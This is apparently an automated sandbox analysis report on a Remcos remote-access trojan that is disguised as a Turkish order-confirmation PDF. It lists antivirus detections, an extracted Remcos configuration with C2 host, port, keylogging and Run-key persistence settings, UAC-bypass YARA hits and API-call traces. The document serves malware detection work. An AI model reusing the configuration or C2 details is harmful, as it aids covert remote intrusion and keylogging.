Source: 8.3.Eluiezilfw.exe.3ac6588.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3967bf0.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac413c.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adafd8.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3975fb8.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac3034.53.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6924.76.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396ff08.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.3168bd8.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973950.87.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3abdda4.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3abdda4.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964578.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3abe4d0.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ecc.86.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396704c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3961b54.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac8008.22.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.DpiScaling.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac00d8.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac03a8.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973e08.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac413c.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39603a8.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397d83c.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3971194.73.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6c84.100.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3abe240.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac2dac.49.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ae4008.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad46cc.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad17a0.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac52c8.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acc008.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac0168.22.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4578.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad28f8.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac26fc.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3963034.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962dac.49.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3979a8c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4ae4.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39626fc.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad3e08.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4008.58.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966588.95.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.232a7c8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396a22c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6d08.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ae4008.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3aca22c.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adafd8.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.logagent.exe.10540000.0.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ad8008.107.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397f8dc.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6d08.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac704c.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad9a8c.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397bf00.63.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac3034.53.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac03a8.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39600d8.19.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acbbdc.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad1194.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4ae4.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4348.65.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad4008.93.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.23635e8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac704c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4008.57.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968560.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.3ab844c.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac5ee4.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad17a0.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6588.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad54e0.101.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adf8dc.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3963034.53.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acdc40.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3978008.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad3950.87.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac5ecc.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac0024.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac8560.28.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acc008.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad17a0.65.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39746cc.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad46cc.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39652c8.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.logagent.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac5ecc.84.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397d83c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ae2814.97.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acdc40.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad5fb8.44.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396217c.47.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.logagent.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 15.0.DpiScaling.exe.10540000.0.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 13.3.Eluiezilfw.exe.3ac5ee4.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396ff08.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3967bf0.17.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960024.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396803c.108.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.22ea9c8.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acd700.50.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad5fb8.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3addbec.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.3ab844c.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4348.64.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4008.57.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.DpiScaling.exe.1054198f.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 13.3.Eluiezilfw.exe.3ac704c.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac413c.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.222a7c8.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac5ee4.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6588.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad1194.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad3950.87.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4348.66.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6588.95.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3979a8c.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ae4008.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3974008.93.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad8008.107.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39652c8.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39794ec.82.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad3950.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad28f8.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ecc.84.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad1194.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adafd8.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad9a8c.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3aca22c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ae2814.99.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4008.58.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973950.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.DpiScaling.exe.10540000.2.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964008.58.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac5ecc.86.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3982814.97.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac2d80.40.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac217c.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3038bd8.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4578.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6924.78.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adbf00.62.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6924.78.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac8560.28.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3abe4d0.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964348.64.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac3034.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964348.65.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964ae4.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968008.21.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad94ec.82.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "Pw`~hustlelord.ddns.net:5017:", "Assigned name": "BIG", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-MZPAVR", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

Exploits
barindex
Yara detected UAC Bypass using ComputerDefaults
Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3ad0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Eluiezilfw.exe.3b0c37c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Eluiezilfw.exe.3b0c37c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395844c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Eluiezilfw.exe.3ab844c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Eluiezilfw.exe.3c30000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39ac37c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Eluiezilfw.exe.3ab844c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Eluiezilfw.exe.3c30000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.348456214.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315970483.0000000003AEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.347895283.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315787933.0000000003968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360606462.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360448965.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe PID: 6356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Eluiezilfw.exe PID: 6880, type: MEMORYSTR
Uses 32bit PE files
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00404C0A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_0040751B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@